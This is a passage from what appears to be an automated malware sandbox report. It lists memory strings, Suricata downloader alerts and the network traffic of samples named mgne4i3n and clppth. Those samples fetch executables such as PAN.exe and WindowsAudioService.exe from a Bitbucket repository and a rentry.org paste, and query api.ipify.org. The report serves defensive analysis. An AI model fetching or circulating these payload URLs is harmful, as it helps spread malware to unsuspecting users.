api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmpString found in memory: base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: global trafficHTTP traffic detected: GET /pancek61111111111111/raw HTTP/1.1Host: rentry.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /goodfuture91/goodfuture511/raw/691a0c82f5c7b1d896caabdcdeb16ee9a65a596d/PAN.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /goodfuture91/goodfuture511/raw/984b882302ec52a90ac71aa3b8aecff3900592a4/P.exe HTTP/1.1Host: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /goodfuture91/goodfuture511/raw/691a0c82f5c7b1d896caabdcdeb16ee9a65a596d/WindowsAudioService.exe HTTP/1.1Host: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Host: api.ipify.orgAccept-Encoding: identity
                        Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Host: api.ipify.orgAccept-Encoding: identity
                        Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Host: api.ipify.orgAccept-Encoding: identity
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49712 -> 185.166.143.50:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 185.166.143.50:443
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_64964610 connect,setsockopt,inet_ntoa,recv,recvfrom,31_2_64964610
                        Source: global trafficHTTP traffic detected: GET /pancek61111111111111/raw HTTP/1.1Host: rentry.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /goodfuture91/goodfuture511/raw/691a0c82f5c7b1d896caabdcdeb16ee9a65a596d/PAN.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /goodfuture91/goodfuture511/raw/984b882302ec52a90ac71aa3b8aecff3900592a4/P.exe HTTP/1.1Host: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /goodfuture91/goodfuture511/raw/691a0c82f5c7b1d896caabdcdeb16ee9a65a596d/WindowsAudioService.exe HTTP/1.1Host: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Host: api.ipify.orgAccept-Encoding: identity
                        Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Host: api.ipify.orgAccept-Encoding: identity
                        Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Host: api.ipify.orgAccept-Encoding: identity
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`, equals www.youtube.com (Youtube)
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q#www.youtube.com_0.indexeddb.le equals www.youtube.com (Youtube)
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp, mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
                        Source: global trafficDNS traffic detected: DNS query: rentry.org
                        Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849282939.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1942221585.000002C498ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.di
                        Source: clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.2060011719.000002C498ACE000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000002.3773078057.000002C498ADB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869C9000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869C9000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: powershell.exe, 00000003.00000002.1682036119.000001D47070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                        Source: svchost.exe, 00000023.00000002.3293647693.000001B218E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869C9000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 